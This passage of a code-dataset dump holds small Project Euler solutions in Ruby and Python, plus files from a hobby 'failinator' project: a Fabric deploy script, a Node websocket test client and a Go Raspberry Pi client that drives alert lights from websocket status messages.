cyclic_set\n\t\telse\n\t\t\treturn nil\n\t\tend\n\telse\n\t\tindices.each do |i|\n\t\t\tto_append = nums[i].find_all { |x| are_cyclic?(x, cyclic_set.last) }\n\t\t\tto_prepend = nums[i].find_all { |x| are_cyclic?(cyclic_set.first, x) }\n\n\t\t\tmap_append = to_append.map do |n|\n\t\t\t\tfind_cyclic(nums, cyclic_set + [n], indices ^ [i])\t\n\t\t\tend\n\t\t\n\t\t\tmap_prepend =\tto_prepend.map do |n|\n\t\t\t\tfind_cyclic(nums, [n] + cyclic_set, indices ^ [i])\t\n\t\t\tend\n\t\t\n\t\t\treturn (map_append + map_prepend).find {|x| !x.nil? }\n\t\tend\n\tend\nend\n\nnums = [:triangle, :square, :pentagonal, :hexagonal, :heptagonal, :octagonal].map do |f|\n\tall_in_range(1, f)\nend\n\nindices = Set.new((0..nums.size - 1).to_a)\nindices.each do |i|\n\tstart = nums[i] \n\tstart.each do |t| \n\t\tfound = find_cyclic(nums, [t], indices ^ [i])\n\t\tif !found.nil?\n\t\t\tp found.reduce(:+)\n\t\t\texit\n\t\tend\n\tend\nend\n" }, { "alpha_fraction": 0.588524580001831, "alphanum_fraction": 0.6295081973075867, "avg_line_length": 16.428571701049805, "blob_id": "585184a7bf252546791b19cb7109fd59bf3ed117", "content_id": "7ffd8081ff9dd5be8315623dcef84671bb1da96c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 610, "license_type": "no_license", "max_line_length": 57, "num_lines": 35, "path": "/26/recurring.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\n#!/usr/bin/ruby\n\nnum_len = 2000\n\ndef shortest_repeating(s)\n\tfound = 0\n\tmax_expected_reoccuring_len = 1000\n\tnum_repeat_tests = 10\n\t(0..max_expected_reoccuring_len).each do |x|\n\t\tfound_reoccurring = (0..num_repeat_tests).all? do |n| \n\t\t\ts[n..(n+x)] == s[(n+x+1)..(n+x+x+1)]\n\t\tend\n\t\t\n\t\tif found_reoccurring\n\t\t\tfound = x + 1\n\t\t\tbreak\n\t\tend\n\tend\n\tfound\nend\n\nmax = 0\nmaxX = 1\n(1..1000).each do |x| \n\tnumerator = Rational(1, x).round(num_len).numerator.to_s\n\tsize = shortest_repeating(numerator)\n\tif (size > max)\n\t\tmax = size\n\t\tmaxX = x\n\tend\nend\n\nputs \"Rational: 1/#{maxX}, Repeating length: #{max}\"\n" }, { "alpha_fraction": 0.5923076868057251, "alphanum_fraction": 0.6256410479545593, "avg_line_length": 19.526315689086914, "blob_id": "57414b49f2aba936be541cd8ec467d3d1a5e48e7", "content_id": "17b8c3810d27930149a432f4055daa2705f985a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 390, "license_type": "no_license", "max_line_length": 80, "num_lines": 19, "path": "/65/e_convergents.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\ndef terms(x)\n\tt = Array.new(x - 1, 1)\n\t1.step(x - 1, 3).each_with_index do |i, index|\n\t\tt[i] = (index + 1) * 2 unless t[i].nil?\n\tend\t\n\t([2] + t).reverse\nend\n\ndef continued_fraction(terms)\n\tif (terms.size == 1)\n\t\tterms.pop\t\n\telse\n\t\tterms.pop + Rational(1, continued_fraction(terms))\n\tend\nend\n\np continued_fraction(terms(100)).numerator.to_s.split(//).map(&:to_i).reduce(:+)\n" }, { "alpha_fraction": 0.29347825050354004, "alphanum_fraction": 0.3913043439388275, "avg_line_length": 17.399999618530273, "blob_id": "4c379570444469ee0afc250e9c1f40561e27c5a7", "content_id": "4c1757fdc6c9237c262c528263e5473cbd3e9da1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 92, "license_type": "no_license", "max_line_length": 61, "num_lines": 5, "path": "/1/sum.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\na = 0\n(1..999).each { |x| a += x if (x % 3 == 0) || (x % 5 == 0) } \nputs a\n" }, { "alpha_fraction": 0.6528028845787048, "alphanum_fraction": 0.6799276471138, "avg_line_length": 22.04166603088379, "blob_id": "41031b9aefeb7e5a4503e29abedc8d87af281855", "content_id": "5ff28c8d509954147853ddd0b60663ff5a740da6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 58, "num_lines": 24, "path": "/92/square_digits_chain.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\ndef next_term(s):\n \treturn reduce(lambda x, y: int(x) + int(y) ** 2, s, \"0\")\n\ndef chain(start, known_arrivals, accum):\n\taccum.add(start)\n\tterm = next_term(str(start))\n\tif term in accum:\n\t\treturn None\n\telif term in known_arrivals:\n\t\treturn accum\t\n\telse:\n\t\treturn chain(term, known_arrivals, accum)\n\nknown_arrivals = set([89])\nfor i in xrange(1, 10000000):\n\tif i not in known_arrivals:\n\t\tchained = chain(i, known_arrivals, set([]))\n\t\tif chained != None:\n\t\t\tknown_arrivals |= chained\n\nprint(known_arrivals)\nprint(len(known_arrivals))\n" }, { "alpha_fraction": 0.49473685026168823, "alphanum_fraction": 0.5508772134780884, "avg_line_length": 12.571428298950195, "blob_id": "03744e5f518cae6bf762fad6addcad95709691d9", "content_id": "0ed4e3cf7e35dbaa32f9743ba915c906ba1fb49a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 285, "license_type": "no_license", "max_line_length": 40, "num_lines": 21, "path": "/47/distinct_prime_factors.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\ndef factors(x)\n\t`factor #{x} | cut -d: -f2`.split.uniq\nend\n\nNEXT_N = 4\n\n(125000..150000).each do |x|\n\tif factors(x).size == NEXT_N\n\t\tnext_n = (1..(NEXT_N - 1)).all? do |n|\n\t\t\ty = x + n\t\n\t\t\tfactors(y).size == NEXT_N\n\t\tend\n\n\t\tif next_n\n\t\t\tputs x\n\t\t\tbreak\n\t\tend\n\tend\nend\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 14.119999885559082, "blob_id": "5c7766b0fd1f77cb0ab89c54e08e283f895660d8", "content_id": "8cf772a41ffaf437a8b9bbab1e65fa08c12d7da1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 378, "license_type": "no_license", "max_line_length": 29, "num_lines": 25, "path": "/55/lychrel.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\ndef transform(x):\n\treturn int(str(x)[::-1]) + x\n\ndef is_palindrome(x):\n\tx_str = str(x)\n\treturn x_str == x_str[::-1]\n\ndef is_lychrel(x):\n\tpal = transform(x)\n\tfor i in xrange(0, 50):\n\t\tif (is_palindrome(pal)):\n\t\t\treturn False\n\t\telse:\n\t\t\tpal = transform(pal)\n\n\treturn True\n\ncount = 0\nfor i in xrange(1, 10000):\n\tif (is_lychrel(i)):\n\t\tcount += 1\n\nprint(count)\n" }, { "alpha_fraction": 0.356589138507843, "alphanum_fraction": 0.4961240291595459, "avg_line_length": 8.923076629638672, "blob_id": "80f52c75fb416548f0efe3eb89758ff3b8c7fa36", "content_id": "cb655291f872c88766c0dc4c6f2e9347e8c4bc61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 28, "num_lines": 13, "path": "/25/fibonacci.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nf1 = 1\nf2 = 1\nfn = 2\nn = 3\nwhile (len(str(fn)) < 1000):\n\tf1 = f2\n\tf2 = fn\n\tfn = f1 + f2 \n\tn += 1\n\nprint(n)\n" }, { "alpha_fraction": 0.5517241358757019, "alphanum_fraction": 0.6068965792655945, "avg_line_length": 10.15384578704834, "blob_id": "ce9a04a383087bce688c89e39734f26ebecc6652", "content_id": "8c28aca82c0dd680b9124b05d87b7dcc29bffed1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 145, "license_type": "no_license", "max_line_length": 21, "num_lines": 13, "path": "/29/distinct.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nrequire 'set'\n\ndistinct = Set.new\n\n(2..100).each do |a|\n\t(2..100).each do |b|\n\t\tdistinct << a ** b\n\tend\nend\n\nputs distinct.size\n" }, { "alpha_fraction": 0.6150793433189392, "alphanum_fraction": 0.6517857313156128, "avg_line_length": 27, "blob_id": "08c8d024ac1d113ac49b791810b4dc425133b097", "content_id": "5b7a0638362122d0a83699eb7135e05a61923ff3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1008, "license_type": "no_license", "max_line_length": 132, "num_lines": 36, "path": "/43/substring_pandigital.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\ndef unique_digits(s):\n\treturn len(set(s)) == len(s)\n\ndef digit_substrs(start, end, step):\n\tunfiltered = [\"%03d\" % i for i in range(start, end, step)]\n\treturn [i for i in unfiltered if unique_digits(i)]\n\ndef flatten(it):\n\tfor e in it:\n\t\tif isinstance(e, list):\n\t\t\tfor f in flatten(e):\n\t\t\t\tyield f\n\t\telse:\n\t\t\tyield e\n\ndiv_by = [2, 3, 5, 7, 11, 13, 17]\nsubstrs = [digit_substrs(0, 999, i) for i in div_by]\n\ndef find_pandigitals(x, col_num, pandigital):\n\tif col_num == 0:\n\t\treturn pandigital\n\n\tnext_col = col_num - 1\n\treturn [find_pandigitals(i, next_col, i[0] + pandigital) for i in substrs[next_col] if i[1:3] == x[0:2] and i[0] not in pandigital]\n\nlast_col = len(div_by) - 1 \nmissing_last_digit = [i for i in flatten([find_pandigitals(i, last_col, i) for i in substrs[last_col]])]\n\ndigits = set(\"1234567890\")\ndef find_last_digit(x):\n\treturn (digits - set(x)).pop() \n\npandigitals = [int(find_last_digit(i) + i) for i in missing_last_digit]\nprint(reduce(lambda x, y: x + y, pandigitals))\n" } ]
52
akhildudhe/Python_WebScrapper_With_Elastic_Search
https://github.com/akhildudhe/Python_WebScrapper_With_Elastic_Search
848073cb6608037feeebe79af19d6e687f8246b0
dad0adb13ce0ec7fd2282e5971a5b961c66394f9
0aeb59e86ebe29d4fb70c3a034d5b2f081908cf3
refs/heads/master
2022-07-12T19:57:49.122543
2020-05-17T09:20:06
2020-05-17T09:20:06
264,503,198
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4094972014427185, "alphanum_fraction": 0.41438546776771545, "avg_line_length": 36.093265533447266, "blob_id": "df451f0699e9fc7b4bbca0f3e6b8b41e6b78fa2d", "content_id": "a86cc76efff479ade58f42faaa279a44cd4255f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7160, "license_type": "permissive", "max_line_length": 321, "num_lines": 193, "path": "/ScrapperProject.py", "repo_name": "akhildudhe/Python_WebScrapper_With_Elastic_Search", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#Importing Necessary Libraries\nfrom bs4 import BeautifulSoup as soup\nimport requests\nimport lxml\nimport re\nimport pandas as pd\nfrom threading import Thread\nfrom elasticsearch import Elasticsearch\n\nif __name__== \"__main__\":\n main_url='https://en.wikipedia.org/wiki/List_of_universities_in_England'\n source=requests.get(my_url).text\n page_soup=soup(source,'lxml')\n containers=page_soup.find('div',{'class':\"mw-parser-output\"})\n rows= containers.table.find_all('tr') \n data=[]\n header_name=[]\n x=0\n type_name=re.split('https://en.wikipedia.org/wiki/',my_url)[1]\n # csv_file=open(csv_name[1],'w')\n\n for row in rows:\n x+=1\n if x==1:\n header=row.find_all('th')\n for hedr in header:\n header_name.append(hedr.text[0:-1])\n header_name.append('Url')\n data.append(header_name)\n else:\n cols = row.find_all('td')\n link='https://en.wikipedia.org'+cols[0].a.get('href')\n cols = [ele.text.strip() for ele in cols]\n cols.append(link)\n data.append([ele for ele in cols if ele])\n\n df = pd.DataFrame.from_records(data[1:], columns=data[0])\n urls=list(df['Url'])\n sub_agg_df = pd.DataFrame(columns=['University','Former names','Detailed_Location','Students','Undergraduates','Postgraduates','Url'])\n print(sub_agg_df)\n\n # defining the function for scraping individual website \n def sub_scrapping(url,indx,U_name):\n print(url,indx)\n my_url=url\n try:\n print('Executing for '+my_url)\n source=requests.get(my_url).text\n page_soup=soup(source,'lxml')\n containers=page_soup.find('table',{'class':\"infobox vcard\"})\n indivual_data={}\n sub_headers=['Former names','Location','Students','Undergraduates','Postgraduates']\n\n for sh in range(1,6):\n sub_container=containers.find_all('tr')\n for ele in sub_container:\n try:\n if ele.th.text==sub_headers[sh-1]:\n indivual_data.update({sub_headers[sh-1]:ele.td.text})\n except:\n pass\n if len(indivual_data) < sh:\n indivual_data.update({sub_headers[sh-1]:None})\n\n\n df_sub=pd.DataFrame([[U_name,indivual_data['Former names'],str(indivual_data['Location']),indivual_data['Students'],indivual_data['Undergraduates'],indivual_data['Postgraduates'],my_url]],columns=['University','Former names','Detailed_Location','Students','Undergraduates','Postgraduates','Url'],index=[indx])\n global sub_agg_df\n sub_agg_df=sub_agg_df.append(df_sub)\n except:\n print('Error in fetching url '+my_url)\n\n threadlist=[]\n for x in df.itertuples():\n td= Thread(target=sub_scrapping,args=(x.Url,x.Index,x.University))\n td.start()\n threadlist.append(td)\n for b in threadlist:\n b.join()\n df.drop('Url', axis=1, inplace=True)\n final_df=pd.merge(sub_agg_df, df, on='University')\n # Optional: Saving the table in CSV format for analysis purspose in excel:\n final_df.to_csv(type_name+'.csv')\n es= Elasticsearch('http://localhost:9200')\n es.indices.delete(index='universities')\n\n # {\n # \"settings\":{\n # \"analysis\":{\n # \"analyzer\":{\n # \"my_analyzer\":{\n # \"type\":\"keyword\",\n # }\n # }\n # }\n # }\n\n # \"mappings\":{\n # \"doc\":{\n # \"dynamic\": \"strict\",\n # \"properties\":{\n # \"University\":{\n # \"type\":\"text\",\n # \"fields\":{\n # \"keyword\":{\n # \"type\":\"keyword\"\n # }\n # },\n # \"analyzer\":\"my_analyzer\"\n # },\n # \"Former names\":{\n # \"type\":\"text\",\n # \"fields\":{\n # \"keyword\":{\n # \"type\":\"keyword\"\n # }\n # },\n # \"analyzer\":\"my_analyzer\"\n # },\n # \"Detailed_Location\":{\n # \"type\":\"text\",\n # \"fields\":{\n # \"keyword\":{\n # \"type\":\"keyword\"\n # }\n # },\n # \"analyzer\":\"my_analyzer\"\n # },\n # \"Students\":{\n # \"type\":\"integer\"\n # },\n # \"Undergraduates\":{\n # \"type\":\"integer\"\n # },\n # \"Postgraduates\":{\n # \"type\":\"integer\"\n # },\n # \"Url\":{\n # \"type\":\"text\",\n # \"fields\":{\n # \"keyword\":{\n # \"type\":\"keyword\"\n # }\n # },\n # \"analyzer\":\"my_analyzer\"\n # },\n # \"Location\":{\n # \"type\":\"text\",\n # \"fields\":{\n # \"keyword\":{\n # \"type\":\"keyword\"\n # }\n # },\n # \"analyzer\":\"my_analyzer\"\n # },\n # \"Established\":{\n # \"type\":\"integer\"\n # },\n # \"Number of students\":{\n # \"type\":\"integer\"\n # },\n # \"Tuition fee\":{\n # \"type\":\"integer\"\n # },\n # \"Degree powers\":{\n # \"type\":\"text\",\n # \"fields\":{\n # \"keyword\":{\n # \"type\":\"keyword\"\n # }\n # },\n # \"analyzer\":\"my_analyzer\"\n # }\n # }\n # }\n # }\n # }\n es.indices.create(index='universities',ignore=400)\n for x in final_df.iterrows():\n es.index(index='universities',doc_type=type_name,id=x[0] ,body=dict(x[1]))\n print('!!!!!!!!----Data Transfer Completed-----!!!!!!!')\n\n es= Elasticsearch('http://localhost:9200')\n res=es.search(index='universities',body={\"from\":0, \"size\":1,\"query\":{\"match\":{\"University\":\"Harper Adams University\"}}})\n res \n # Execting queries\n res=es.search(index=\"universities\",body={\"from\":0, \"size\":2, \"query\":{\"bool\":{\"must\":{\"match\":{\"University\":\"Harper Adams University\"}},\"must\":{\"match\":{\"Former names\":\"None\"}}}}}) \n res\n\n" }, { "alpha_fraction": 0.6131661534309387, "alphanum_fraction": 0.6156739592552185, "avg_line_length": 52.16666793823242, "blob_id": "ba70e6effbb4269ae1c44a068bfc348e9e953d09", "content_id": "3a80a7339adcea9e2108035c55e342acda870db9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1595, "license_type": "permissive", "max_line_length": 198, "num_lines": 30, "path": "/README.md", "repo_name": "akhildudhe/Python_WebScrapper_With_Elastic_Search", "src_encoding": "UTF-8", "text": "\n# Multiple Sub-iterable Webscrapping with Threading and Elastic Search.\n## Near-Production ready code.\n - Akhil Dudhe\n\n-----------------------------\n### Objectives of this project to build Data pipline for iterable webscrapping with the help of scalable solutions around. The project focus on following:\n1. Offers python solution for Webscrapping with Multi-Threading to achive parallelism. \n2. Offering fast query solution using Elastic Search.\n-----------------------------\n### Problem Statement : Building a repository of universities of a particular country.\n### Problem Assumption : Country selected as <a href=\"https://en.wikipedia.org/wiki/List_of_universities_in_England\">United Kingdom</a>.\n-----------------------------\n### Setup Requirement to Run <a href=\"https://github.com/akhildudhe/Python_WebScrapper_With_Elastic_Search/blob/master/ScrapperProject.ipynb\">ScrapperProject.ipynb</a> file\n\n<ol type=\"number\">\n <li> 3.7 Python version <a href=\"https://www.anaconda.com/products/individual\">Jupyter Notebook</a> with following libraries installed using \"pip install library_name\" command in conda teminal.\n <ul>\n <li>BeautifulSoup</li>\n <li>requests</li>\n <li>lxml</li>\n <li>threading</li>\n <li>elasticsearch</li>\n </ul>\n </li>\n <li><a href=\"https://www.elastic.co/downloads/elasticsearch\">Elastic Search Server</a></li>\n</ol>\n\n------------------------------------\n\nLicensed under the [MIT License](LICENSE)" } ]
2
apparentlymart/failinator
https://github.com/apparentlymart/failinator
5e5eab0c6558e118a105b8731bd2c8c0bf408beb
c828567d545b3c76fbca5c93a9861e2c39bc58e2
f13cace24165f093f44a8ce4d7c5a9945e36a15e
refs/heads/master
2023-07-08T17:44:56.776524
2016-05-30T21:38:31
2016-05-30T21:38:31
43,111,391
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6891891956329346, "alphanum_fraction": 0.7200772166252136, "avg_line_length": 29.41176414489746, "blob_id": "d80fcec53ad7285cb77d4d0844ba1f32db073686", "content_id": "ae498360732e5d0504281eaeeb69d6a50b74352a", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "Python", "length_bytes": 518, "license_type": "no_license", "max_line_length": 72, "num_lines": 17, "path": "/fabfile.py", "repo_name": "apparentlymart/failinator", "src_encoding": "UTF-8", "text": "\nfrom fabric.api import env\nfrom fabric.operations import sudo, run\nfrom fabric.contrib.project import rsync_project\n\n\nenv.hosts = ['[email protected]']\nenv.key_filename = 'provisioning_private_key'\n\n\ndef deploy():\n # make sure the directory is there!\n sudo('mkdir -p /opt/failinator')\n\n # upload files in the current dir to the remote dir\n rsync_project(remote_dir='/opt/failinator', local_dir='./')\n\n run('cd /opt/failinator/server; SERVER_PORT=3000 npm start')\n" }, { "alpha_fraction": 0.6314184069633484, "alphanum_fraction": 0.6449754238128662, "avg_line_length": 16.458580017089844, "blob_id": "b748c26381ac9109dc897404eb9d273fcb38412d", "content_id": "0a6124a74d440b18454675e15735ec33f230dcc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 5901, "license_type": "no_license", "max_line_length": 68, "num_lines": 338, "path": "/client/main.go", "repo_name": "apparentlymart/failinator", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"encoding/json\"\n\t\"log\"\n\t\"sync\"\n\t\"time\"\n\n\t\"github.com/kidoman/embd\"\n\t_ \"github.com/kidoman/embd/host/rpi\"\n\t\"golang.org/x/net/websocket\"\n)\n\ntype Status struct {\n\tWarning bool `json:\"warning\"`\n\tCritical bool `json:\"critical\"`\n\tPaging bool `json:\"paging\"`\n\tLastPageTime int `json:\"lastAlert\"`\n\n\t// Lock before interacting with the object.\n\tsync.Mutex\n}\n\nvar quit bool\nvar status Status\nvar statusMutex sync.Mutex\n\ntype Lights struct {\n\tredPin embd.DigitalPin\n\tyellowPin embd.DigitalPin\n\tgreenPin embd.DigitalPin\n}\n\nfunc OpenLights() (*Lights, error) {\n\tredPin, err := embd.NewDigitalPin(2)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tyellowPin, err := embd.NewDigitalPin(3)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tgreenPin, err := embd.NewDigitalPin(4)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err := redPin.SetDirection(embd.Out); err != nil {\n\t\tpanic(err)\n\t}\n\tif err := yellowPin.SetDirection(embd.Out); err != nil {\n\t\tpanic(err)\n\t}\n\tif err := greenPin.SetDirection(embd.Out); err != nil {\n\t\tpanic(err)\n\t}\n\n\tl := &Lights{\n\t\tredPin: redPin,\n\t\tyellowPin: yellowPin,\n\t\tgreenPin: greenPin,\n\t}\n\n\treturn l, nil\n}\n\nfunc (l *Lights) Close() error {\n\tl.redPin.Close()\n\tl.yellowPin.Close()\n\tl.greenPin.Close()\n\treturn nil\n}\n\ntype Digits struct {\n\tmosiPin embd.DigitalPin\n\tclkPin embd.DigitalPin\n\tcsPin embd.DigitalPin\n}\n\nfunc (d *Digits) sendByte(b byte) error {\n\n\treturn nil\n}\n\nfunc OpenDigits() (*Digits, error) {\n\tmosiPin, err := embd.NewDigitalPin(10)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tclkPin, err := embd.NewDigitalPin(11)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcsPin, err := embd.NewDigitalPin(8)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err := mosiPin.SetDirection(embd.Out); err != nil {\n\t\tpanic(err)\n\t}\n\tif err := clkPin.SetDirection(embd.Out); err != nil {\n\t\tpanic(err)\n\t}\n\tif err := csPin.SetDirection(embd.Out); err != nil {\n\t\tpanic(err)\n\t}\n\n\treturn &Digits{\n\t\tmosiPin: mosiPin,\n\t\tclkPin: clkPin,\n\t\tcsPin: csPin,\n\t}, nil\n}\n\nfunc (d *Digits) Close() error {\n\td.clkPin.Close()\n\td.mosiPin.Close()\n\td.csPin.Close()\n\treturn nil\n}\n\nfunc (d *Digits) write(val uint16) error {\n\terr := d.csPin.Write(embd.High)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = d.csPin.Write(embd.Low)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor i := 16; i > 0; i-- {\n\t\tmask := uint16(1 << uint16(i-1))\n\n\t\terr := d.clkPin.Write(0)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif val&mask != 0 {\n\t\t\terr = d.mosiPin.Write(1)\n\t\t} else {\n\t\t\terr = d.mosiPin.Write(0)\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\terr = d.clkPin.Write(1)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\terr = d.csPin.Write(embd.High)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}\n\nfunc (d *Digits) Try() error {\n\tfor {\n\t\terr := d.write(0xffff)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\ttime.Sleep(1000 * time.Millisecond)\n\t\terr = d.write(0x0000)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\ttime.Sleep(1000 * time.Millisecond)\n\t}\n\treturn nil\n}\n\nfunc hardware() {\n\tif err := embd.InitGPIO(); err != nil {\n\t\tpanic(err)\n\t}\n\tdefer embd.CloseGPIO()\n\n\tif err := embd.InitSPI(); err != nil {\n\t\tpanic(err)\n\t}\n\tdefer embd.CloseSPI()\n\n\tlights, err := OpenLights()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer lights.Close()\n\n\tdigits, err := OpenDigits()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer digits.Close()\n\n\tgo digits.Try()\n\n\tfor !quit {\n\t\tstatusMutex.Lock()\n\t\tyellow := status.Warning\n\t\tred := status.Critical\n\t\tredBlink := status.Paging\n\t\tgreen := !(red || yellow)\n\t\t//lastPageTime := status.LastPageTime\n\t\tstatusMutex.Unlock()\n\n\t\tvar redVal int\n\t\tvar yellowVal int\n\t\tvar greenVal int\n\t\tif red {\n\t\t\tredVal = embd.High\n\t\t}\n\t\tif yellow {\n\t\t\tyellowVal = embd.High\n\t\t}\n\t\tif green {\n\t\t\tgreenVal = embd.High\n\t\t}\n\t\tlights.redPin.Write(redVal)\n\t\tlights.yellowPin.Write(yellowVal)\n\t\tlights.greenPin.Write(greenVal)\n\t\ttime.Sleep(500 * time.Millisecond)\n\t\tif red && redBlink {\n\t\t\tlights.redPin.Write(embd.Low)\n\t\t}\n\t\ttime.Sleep(500 * time.Millisecond)\n\t}\n}\n\nfunc powerOnTest() {\n\tstatusMutex.Lock()\n\tstatus.Warning = false\n\tstatus.Critical = false\n\tstatus.Paging = false\n\tstatus.LastPageTime = 0\n\tstatusMutex.Unlock()\n\ttime.Sleep(2 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.Warning = true\n\tstatus.Critical = false\n\tstatus.Paging = false\n\tstatus.LastPageTime = 1\n\tstatusMutex.Unlock()\n\ttime.Sleep(2 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.Warning = false\n\tstatus.Critical = true\n\tstatus.Paging = false\n\tstatus.LastPageTime = 2\n\tstatusMutex.Unlock()\n\ttime.Sleep(2 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.Warning = false\n\tstatus.Critical = false\n\tstatus.Paging = false\n\tstatus.LastPageTime = 2\n\tstatusMutex.Unlock()\n\ttime.Sleep(2 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.LastPageTime = 3\n\tstatusMutex.Unlock()\n\ttime.Sleep(1 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.LastPageTime = 4\n\tstatusMutex.Unlock()\n\ttime.Sleep(1 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.LastPageTime = 5\n\tstatusMutex.Unlock()\n\ttime.Sleep(1 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.LastPageTime = 0\n\tstatusMutex.Unlock()\n}\n\nfunc socket() {\n\thost := \"ec2-54-183-68-122.us-west-1.compute.amazonaws.com:3000\"\n\twsUrl := \"ws://\" + host + \"/failinator\"\n\toriginUrl := \"http://\" + host\n\n\tfor {\n\t\tvar conn *websocket.Conn\n\t\tvar err error\n\t\tfor {\n\t\t\tconn, err = websocket.Dial(wsUrl, \"\", originUrl)\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(\"Error connecting to\", wsUrl, err)\n\t\t\t\ttime.Sleep(2 * time.Second)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tbreak\n\t\t}\n\t\tdefer conn.Close()\n\n\t\tfor {\n\t\t\tmsg := make([]byte, 512)\n\t\t\tn, err := conn.Read(msg)\n\t\t\tif err != nil {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tmsg = msg[:n]\n\n\t\t\tstatus.Lock()\n\t\t\tlog.Println(\"Message\", string(msg))\n\t\t\terr = json.Unmarshal(msg, &status)\n\t\t\tstatus.Unlock()\n\n\t\t\tif err != nil {\n\t\t\t\t// Just skip an invalid message.\n\t\t\t\tlog.Println(\"Skipping invalid message: \", err)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\n\t\tlog.Println(\"Error reading from socket. Will try to reconnect...\")\n\t\ttime.Sleep(2 * time.Second)\n\t}\n}\n\nfunc main() {\n\tgo hardware()\n\tpowerOnTest()\n\tsocket()\n}\n" }, { "alpha_fraction": 0.6493212580680847, "alphanum_fraction": 0.6538461446762085, "avg_line_length": 30.5, "blob_id": "3935954b10b4331c1859f6e4e264978d6feefaee", "content_id": "8d5108db537d1cc412eebcfca04afc13189f72f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 442, "license_type": "no_license", "max_line_length": 61, "num_lines": 14, "path": "/server/test_client_reads.js", "repo_name": "apparentlymart/failinator", "src_encoding": "UTF-8", "text": "\nvar SERVER_PORT = process.env.SERVER_PORT || 80;\n\nvar WebSocket = require('ws');\nvar ws = new WebSocket('ws://localhost:' + SERVER_PORT);\n\nws.on('open', function open() {\n console.log('[test_client_reads]: open');\n});\n\nws.on('message', function(data, flags) {\n // flags.binary will be set if a binary data is received.\n // flags.masked will be set if the data was masked.\n console.log('[test_client_reads] received:', data);\n});\n" }, { "alpha_fraction": 0.7448559403419495, "alphanum_fraction": 0.7448559403419495, "avg_line_length": 29.25, "blob_id": "6defa2cddc8a23aac99ad1a7d76f475f3b851f94", "content_id": "058d01b1cc8ed8c74f335def98683a808ecaac3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 243, "license_type": "no_license", "max_line_length": 80, "num_lines": 8, "path": "/client/README.md", "repo_name": "apparentlymart/failinator", "src_encoding": "UTF-8", "text": "Failinator Client\n=================\n\nThe *client* portion of Failinator is what runs on the Raspberry Pi and controls\nthe devices on the custom PCB.\n\nIt connects to the server to recieve push notifications of data via a\nwebsocket connection.\n\n" }, { "alpha_fraction": 0.6016949415206909, "alphanum_fraction": 0.6186440587043762, "avg_line_length": 27.413793563842773, "blob_id": "ac9aa342b6424cb3fd14247aa4e2733d40f0cf4a", "content_id": 